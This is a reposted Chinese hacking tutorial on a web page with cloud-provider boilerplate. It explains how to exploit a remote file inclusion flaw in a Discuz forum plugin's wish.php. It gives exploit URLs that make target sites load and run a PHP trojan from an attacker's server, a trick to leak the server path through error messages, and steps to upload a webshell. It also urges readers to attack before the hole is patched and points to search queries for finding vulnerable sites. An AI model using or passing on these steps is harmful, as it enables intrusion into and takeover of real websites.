Discuz外掛程式漏洞攻擊_PHP教程

來源:互聯網
上載者:User
PS:話說光這個漏洞《駭客X檔案》都說了N遍,呵呵........
既然有人公布了,也有人連利用程式都寫好了,那我也就公布吧!訊息來源是鬼仔告訴我的,好像是Firefox哪個大哥發現的洞,不太清楚了!
  discuz論壇的許願池外掛程式在DZ根目錄有個wish.php檔案,檔案第四行:
require $discuz_root.‘./include/discuzcode.func.php‘;
很明顯程式沒有做任何過濾,一個十足的遠程包含漏洞,具體利用方法就很簡單了:
http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt?
別忘了後面有個問號!xxxx.txt就是我的PHP木馬,c99shell不知道為什麼,我沒成功,也許與作業系統有關,我沒仔細去實驗了,直接用的安全天使的那PHP後門,不過可以得到一個"webshell",但是用安全天使那PHP後門無法上傳我們真正的webshell上去,所以用下面這個檔案就可以上傳你的WEBSHELL到網站目錄,


怎麼得到網站實際路徑呢?很簡單,直接開啟http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt ,不要最後那個問號,這時你會發現程式報錯了,網站的實際路徑也就出來了!修改個檔案裡的
C:Inetpubvhostsaidu.combs
為當前你要黑的這個網站實際路徑;cntink.php是你上傳webshell後需要儲存的名字,隨便你取什麼!
  把上面那檔案儲存為txt(其他副檔名也可以)上傳到你自己的網站,比如我取名為fly.txt,現在再開啟
http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/fly.txt?
OK...看見上傳對話方塊了吧,慢慢上傳你的webshell吧!上傳後的路徑就是你在fly.txt中所設定的路徑!
  以上文章純屬亂寫,誰利用這方法黑了站遇到麻煩別找我....其實這玩意應該是發布補丁後才能公開的,但又不是官方的外掛程式,而且別人都發了,無所謂了!
PS:要行動的快點,引用群裡某X的一句話: baidu google都把discuz inurl:wish.php搜完了 不過漏洞沒補


http://www.bkjia.com/PHPjc/629813.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/629813.htmlTechArticlePS:話說光這個漏洞《駭客X檔案》都說了N遍,呵呵........ 既然有人公布了,也有人連利用程式都寫好了,那我也就公布吧!訊息來源是鬼仔告訴...

  • 聯繫我們

    該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

    如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.